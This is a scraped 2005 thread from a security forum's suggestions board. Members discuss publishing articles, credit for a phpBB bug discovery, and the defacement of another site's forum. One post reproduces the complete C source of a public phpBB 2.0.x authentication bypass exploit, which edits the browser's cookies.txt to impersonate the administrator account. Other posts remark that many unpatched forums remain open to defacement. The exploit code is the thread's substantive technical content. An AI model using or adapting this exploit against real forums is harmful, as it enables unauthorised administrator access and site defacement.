 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
another suggestion from me |
 |
 Posted: Sat Apr 09, 2005 4:06 pm |
 |
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
 |
|
 |
|
waraxe , i see that if u publish/submit some news will get 10 point , but i dont find any news on this site ? how is that ?
i think many people here found many 'good' news to share
btw , why dont u give some space for article section  maybe for paper about your eexploiting technichal detail for one advisories 
ive made one paper about highlight holes in phpbb and already publish in my community site, but as u see im to 'lazy' to write another  , so maybe u could write about sql ( i know you good on that  ) or another interesting point
maybe some friends would share ? LINUX ? slimjim ? Heintz ? pokylez or .. somebody ?
heintz : im still waiting about detailed exploiting phpbb |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
| Posted: Sat Apr 09, 2005 4:18 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Yep, news/articles/topics section is not fully functional yet...
You can still submit the stuff and i will look, if i can put it up right now.
This news thing, it needs some work from me (some code improvements/debug/tests), i will make it functional as soon as possible, but yeah, all submissions are welcome allready now |
|
|
|
|
| Posted: Sat Apr 09, 2005 4:35 pm |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
on the contrary , im waiting a paper from you
hehhe.. maybe i post something if i not too busy .. but im not promising here |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Sat Apr 09, 2005 5:54 pm |
|
|
| Heintz |
| Valuable expert |
 |
|
| Joined: Jun 12, 2004 |
| Posts: 88 |
| Location: Estonia/Sweden |
|
|
|
|
|
|
|
_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
|
|
|
|
| Posted: Sat Apr 09, 2005 6:33 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Heintz, look here:
http://forum.zone-h.org/viewtopic.php?t=2189
| Quote: |
SyS64738
Zone-H Staff
Posted: Fri Mar 04, 2005 9:54 am Post subject:
--------------------------------------------------------------------------------
http://www.k-otik.com/exploits/20050228.phpbbsession.c.php
that was the one they used.
Relax, all they could do was to change the database. No rights over the machine.
When we choosed phpbb we accounted the forum could be hacked twice per year. It was just about time.
All you have to do now is to start the cronometer and see how long it will take till the next time, you have to live with it unless you want to write your own forum application
For Zone-H is no harsh, after all is only backing up our theory where the future hacking playgorund will be mostly at the application level. Now everybody is saying that but I recall that Zone-H has been the first public source that started to say it around.
Strange we didn't receive any notification about the episode in our mirror database.
A hug
SyS64738
_________________
www.zone-h.org admin
|
Heh, zone-h is defacer's heaven and they forum got defaced by Heintz exploit 
But let's look further:
http://www.k-otik.com/exploits/20050228.phpbbsession.c.php
| Code: |
phpBB 2.0.x Session Handling Administrator Authentication Bypass Exploit
Date : 28/02/2005
Related Advisories : FrSIRT/ADV-2005-0212
Rated as : High
/*
Author: Paisterist
Date: 28-02-05
[N]eo [S]ecurity [T]eam ?
Description: this exploit modify the user id that is in your
cookies.txt (Firefox and Mozilla) file.
You have to log in the forum, with the autologin option unchecked,
then you close the navigator and
execute the exploit.
If you have any problem with the exploit, remove all cookies and do all
again.
Note: you have to put the exploit in the same directory of cookies.txt.
This exploit overwrite all phpbb cookies that have the user id
specified.
I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS
DISCOVERED IT.
By Paisterist
http://neosecurityteam.net
http://neosecurityteam.tk
Greetz: Hackzatan, Crashcool, Towner, Daemon21, Wokkko, Maxx,
Arcanhell, Alluz.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char** argv[]) {
FILE *pointer;
char contenido[10000],
cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0
%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
cookief[9]="%22%3B%7D", cookiec[106],
cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb
%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
*pos;
int p=0, i=0;
if (argc!=2) {
printf("Usage: phpbb_exploit.exe user_id\n\n");
exit(0);
}
pointer=fopen("cookies.txt", "r");
if (pointer) {
fread(contenido, 300, 10, pointer);
fclose(pointer);
} else {
printf("The file can't be open\n");
exit(0);
}
strcpy(cookiec, cookie);
strncat(cookiec, argv[1], 6);
strcat(cookiec, cookief);
if (pos=strstr(contenido, cookiec)) {
p=pos - contenido;
while (i<92) {
if (cookie_false[i]!=NULL)
contenido[p]=cookie_false[i];
p++;
i++;
}
}
else {
printf("The file cookies.txt isn't valid for execute the
exploit or the user id is incorrect\n");
exit(0);
}
if (pointer=fopen("cookies.txt", "w")) {
fputs(contenido, pointer);
printf("Cookie modified: \n\n%s\n\n", contenido);
printf("The cookies file has overwriten... looks like the exploit has worked");
} else printf("\n\nThe file cookies.txt has not write permissions.");
return 0;
}
|
As we can see:
| Quote: |
I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS
DISCOVERED IT.
|
So they don't know, who has discovered this bug 
wtf? |
|
|
|
|
|
|
|
|
| Posted: Sat Apr 09, 2005 7:04 pm |
|
|
| Heintz |
| Valuable expert |
|
|
| Joined: Jun 12, 2004 |
| Posts: 88 |
| Location: Estonia/Sweden |
|
|
|
|
|
|
yea. very little ammount of people know hwo actually found the bug.
i thought i release the info about bug day earlier to theese forums. to make this sites visitors feel more "privileged" then other security site visitors. and then let developers know to prevent chaos. but someone who read this info allready had let them know about it, and i was a bit late. so they put info to their site and told me i was not going to be credited for it. most exploit writers have probably got the info from phpbb.com.
but i can live with it 
but thing is that they are not very friendly also about bug reporting (register to forum, so you could use their bug tracker). but who writes the rules about this thing anyway? they should be makeing it easier to report bugs to them, and be thankful for it, they benefit from it, not bug reporter. if bug reporter have to choose between: 1)registering (which can be tricky when activation code gets caught by spam-filter) and formating the bug very specifically.
or 2) selling it to some pr0n firm for example  (this includes all self-befitting stuff)
then i doupt that all choose the 1.
i hope i made some point.. but i don't expect anyone to understand this |
|
_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
|
|
|
|
| Posted: Sun Apr 10, 2005 2:59 am |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
well thx ,
old thing with new effect
fyi: there are many forum still leave unpatch (what a lazy admin ) |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
| Posted: Sun Apr 10, 2005 3:03 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| y3dips wrote: |
fyi: there are many forum still leave unpatch (what a lazy admin ) |
This exploit will be vital for long time - because for example even after 6 months from now there will be webmasters, who will install some old phpbb version and its only question of time, when that website will be defaced |
|
|
|
|
| Posted: Sun Apr 10, 2005 3:35 am |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
yap, you right waraxe, the old phpbb version still spread like a time bomb () , i download one from SF.net (the 2.0.11) to do some research, first i thought that it already patched , but im wrong coz it leave unpacth
so ? |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
www.waraxe.us Forum Index -> Suggestions
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 85
Members: 0
Total: 85
